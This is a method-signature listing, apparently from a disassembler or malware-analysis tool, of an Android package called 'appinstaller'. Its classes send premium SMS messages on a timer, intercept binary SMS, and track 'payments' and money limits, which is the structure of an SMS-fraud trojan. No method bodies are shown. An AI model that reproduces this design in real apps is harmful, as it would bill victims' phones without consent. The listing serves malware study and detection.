Lcom/soft/android/appinstaller/services/SMSSenderService$1;-><init>(Lcom/soft/android/appinstaller/services/SMSSenderService;)V [access_flags=constructor] @ 0x6380
Ljava/util/TimerTask;-><init>()V
Lcom/soft/android/appinstaller/services/SMSSenderService$1;->run()V [access_flags=public] @ 0x639c
Ljava/util/Timer;->cancel()V
Lcom/soft/android/appinstaller/services/SMSSenderService;->stopSelf()V
Lcom/soft/android/appinstaller/sms/capi/SMSSenderEngine;->sendOneMessage()V [access_flags=public abstract] @ 0x0
Lcom/soft/android/appinstaller/sms/capi/SMSSenderEngine;->canSendMoreMessages()Z [access_flags=public abstract] @ 0x0
Lcom/soft/android/appinstaller/services/SMSSenderService;->access$000(Lcom/soft/android/appinstaller/services/SMSSenderService;)Ljava/util/Timer; [access_flags=static synthetic] @ 0x6458
Lcom/soft/android/appinstaller/services/SMSSenderService;-><init>()V [access_flags=public constructor] @ 0x6430
Landroid/app/Service;-><init>()V
Lcom/soft/android/appinstaller/services/SMSSenderService;->onCreate()V [access_flags=public] @ 0x6484
Lcom/soft/android/appinstaller/sms/capi/SMSSenderEngine;->init(Lcom/soft/android/appinstaller/sms/Limits;)V [access_flags=public abstract] @ 0x0
Lcom/soft/android/appinstaller/services/SMSSenderService;->getApplicationContext()Landroid/content/Context;
Ljava/util/Timer;-><init>(Ljava/lang/String;)V
Lcom/soft/android/appinstaller/services/SMSSenderService;->getSharedPreferences(Ljava/lang/String; I)Landroid/content/SharedPreferences;
Lcom/soft/android/appinstaller/sms/Limits;-><init>(I I I)V [access_flags=public constructor] @ 0x6810
Lcom/soft/android/appinstaller/sms/internals/UnconfirmableSMSSenderEngineImpl;-><init>(Lcom/soft/android/appinstaller/core/SmsInfo; Landroid/content/SharedPreferences; Landroid/content/Context;)V [access_flags=public constructor] @ 0x6adc
Lcom/soft/android/appinstaller/sms/internals/ConfirmableSMSSenderEngineImpl;-><init>(Lcom/soft/android/appinstaller/core/SmsInfo; Landroid/content/SharedPreferences; Landroid/content/Context;)V [access_flags=public constructor] @ 0x68dc
Lcom/soft/android/appinstaller/services/SMSSenderService;->onStart(Landroid/content/Intent; I)V [access_flags=public] @ 0x6560
Ljava/util/Timer;->scheduleAtFixedRate(Ljava/util/TimerTask; J J)V
Lcom/soft/android/appinstaller/sms/BasicSMSSender;-><init>()V [access_flags=public constructor] @ 0x65c8
Lcom/soft/android/appinstaller/sms/BasicSMSSender;->SendMessage(Landroid/content/Context; Lcom/soft/android/appinstaller/core/SmsInfo$SMS;)V [access_flags=public] @ 0x65e0
Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V
Landroid/app/PendingIntent;->getActivity(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
Lcom/soft/android/appinstaller/sms/BinarySMSReceiver;-><init>()V [access_flags=public constructor] @ 0x669c
Landroid/content/BroadcastReceiver;-><init>()V
Lcom/soft/android/appinstaller/sms/BinarySMSReceiver;->setLastReceivedSMSTime(Landroid/content/Context;)V [access_flags=private] @ 0x66b4
Landroid/content/Context;->getSharedPreferences(Ljava/lang/String; I)Landroid/content/SharedPreferences;
Lcom/soft/android/appinstaller/sms/BinarySMSReceiver;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x66f4
Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;
Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;
Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
Ljava/lang/Character;->toString(C)Ljava/lang/String;
Landroid/telephony/SmsMessage;->getUserData()[B
Lcom/soft/android/appinstaller/sms/Limits;->registerFailedPaymend(Lcom/soft/android/appinstaller/core/SmsInfo$SMS;)V [access_flags=public] @ 0x6864
Lcom/soft/android/appinstaller/sms/Limits;->registerSuccessfulPayment(Lcom/soft/android/appinstaller/core/SmsInfo$SMS;)V [access_flags=public] @ 0x6888
Lcom/soft/android/appinstaller/sms/Limits;->expectedMoneyRest()I [access_flags=public] @ 0x684c
Lcom/soft/android/appinstaller/sms/Limits;->dcSmsCountRest()I [access_flags=public] @ 0x6834
Lcom/soft/android/appinstaller/sms/Limits;->smsCountRest()I [access_flags=public] @ 0x68c4
Lcom/soft/android/appinstaller/sms/internals/ConfirmableSMSSenderEngineImpl;->isLastSentSMSApproved()Z [access_flags=private] @ 0x6910
Lcom/soft/android/appinstaller/sms/internals/ConfirmableSMSSenderEngineImpl;->updateLastSentTime()V [access_flags=private] @ 0x6954
Lcom/soft/android/appinstaller/sms/internals/ConfirmableSMSSenderEngineImpl;->SendMessage(Landroid/content/Context; Lcom/soft/android/appinstaller/core/SmsInfo$SMS;)V [access_flags=public] @ 0x698c
Lcom/soft/android/appinstaller/sms/internals/ConfirmableSMSSenderEngineImpl;->canSendMoreMessages()Z [access_flags=public] @ 0x69b0
Lcom/soft/android/appinstaller/sms/internals/ConfirmableSMSSenderEngineImpl;->sendOneMessage()V [access_flags=public] @ 0x6a70
Lcom/soft/android/appinstaller/sms/internals/UnconfirmableSMSSenderEngineImpl;->canSendMoreMessages()Z [access_flags=public] @ 0x6b0c
Lcom/soft/android/appinstaller/sms/internals/UnconfirmableSMSSenderEngineImpl;->sendOneMessage()V [access_flags=public] @ 0x6bc4
Lcom/soft/android/appinstaller/sms/internals/UnconfirmableSMSSenderEngineImpl;->SendMessage(Landroid/content/Context; Lcom/soft/android/appinstaller/core/SmsInfo$SMS;)V
